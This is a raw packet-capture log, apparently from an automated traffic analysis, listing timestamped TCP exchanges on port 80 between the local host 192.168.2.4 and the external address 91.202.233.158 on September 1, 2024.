Sep 1, 2024 18:28:20.471818924 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.471982002 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.471992970 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472018957 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.472027063 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472037077 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.472038031 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472048998 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472059965 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472064018 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.472070932 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472081900 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472083092 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.472093105 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472095966 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.472115993 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.472129107 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.472280025 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472292900 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472302914 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472326040 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.472342968 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.472373962 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472385883 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472394943 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472407103 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472418070 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472423077 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.472429991 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472440958 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472445011 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.472465038 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.472477913 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.472861052 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472882986 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472894907 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472904921 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472915888 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472924948 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.472927094 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472939014 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472944975 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.472949982 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472959042 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.472960949 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472973108 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472976923 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.472985029 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472995996 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.472996950 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.473006964 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473017931 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473018885 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.473028898 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473037004 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.473040104 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473052025 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473063946 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.473064899 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473077059 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473078012 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.473093987 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.473118067 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.473524094 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473535061 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473545074 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473558903 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473572016 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.473576069 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473581076 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.473587036 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473597050 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473598957 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.473622084 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.473638058 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.473797083 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473809004 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473819971 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473834038 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473836899 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.473845959 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473850012 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.473858118 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473869085 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473870993 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.473885059 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.473903894 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.473927975 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.473932028 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473948956 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473959923 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473967075 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.473970890 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473980904 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.473983049 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.473992109 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.474003077 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.474006891 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.474014044 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.474025011 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.474025011 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.474036932 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.474045038 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.474050045 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.474061012 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.474062920 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.474072933 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.474085093 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.474086046 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.474093914 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.474107981 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.474121094 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.474133968 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.474726915 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.474739075 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.474749088 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.474760056 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.474766016 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.474771976 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.474780083 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.474785089 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.474797010 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.474802017 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.474807978 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.474818945 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.474818945 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.474836111 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.474838018 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.474845886 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.474857092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.474858046 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.474869967 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.474870920 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.474879980 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.474891901 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.474908113 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.474920988 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.475263119 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.475281000 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.475291967 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.475303888 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.475303888 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.475315094 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.475321054 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.475330114 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.475338936 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.475339890 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.475352049 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.475356102 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.475363016 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.475369930 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.475373983 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.475387096 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.475388050 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.475398064 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.475402117 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.475410938 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.475421906 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.475428104 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.475445986 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.475464106 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.558080912 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558137894 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558149099 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558155060 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.558176994 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.558187962 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.558199883 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558208942 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558218002 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558231115 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558240891 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.558244944 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558269978 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.558288097 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.558362007 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558372021 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558403969 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.558617115 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558625937 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558640003 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558649063 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558655024 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.558659077 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558667898 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.558670044 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558680058 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558687925 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558695078 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.558698893 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558718920 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.558727980 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.558754921 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558764935 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558773994 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558784008 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558790922 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.558793068 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558818102 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.558828115 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.558969021 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558978081 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558988094 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.558998108 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559005976 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.559036016 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.559113026 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559123039 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559132099 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559142113 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559150934 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559150934 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.559159040 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.559161901 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559185982 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.559206963 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.559480906 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559490919 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559499979 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559509993 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559520006 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559525013 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.559530020 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559550047 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.559565067 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.559580088 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559588909 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559597969 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559607983 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559612036 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.559618950 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559631109 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559637070 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.559639931 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559668064 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.559675932 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.559765100 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559808969 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.559937954 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559947014 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559954882 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559964895 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559974909 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559974909 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.559983015 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.559990883 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.560000896 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.560002089 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.560009956 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.560014009 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.560020924 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.560030937 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.560041904 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.560044050 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.560060024 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.560081005 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.560309887 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.560319901 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.560329914 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.560353041 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.560373068 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.560522079 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.560532093 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.560540915 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.560568094 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.560586929 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.560594082 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.560605049 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.560612917 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.560621977 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.560632944 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.560637951 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.560642958 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.560652971 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.560662985 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.560679913 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.560689926 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.047424078 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.047539949 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.183260918 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.189393997 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.409347057 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.409360886 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.409370899 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.409420013 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.409432888 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.409444094 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.409455061 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.409461021 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.409472942 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.409493923 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.409513950 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.409703970 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.409714937 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.409724951 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.409737110 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.409739971 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.409746885 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.409751892 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.409758091 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.409768105 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.409770966 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.409779072 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.409790993 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.409810066 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.409826994 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.410094023 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410104990 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410116911 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410137892 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.410166979 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.410300970 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410315990 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410325050 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410336971 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410347939 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410348892 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.410361052 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410371065 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410372972 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.410382032 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410388947 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.410393000 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410404921 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410415888 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.410415888 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410428047 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410439968 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410439968 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.410449982 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410458088 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.410460949 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410480022 CEST	56177	80	192.168.2.4	91.202.233.158
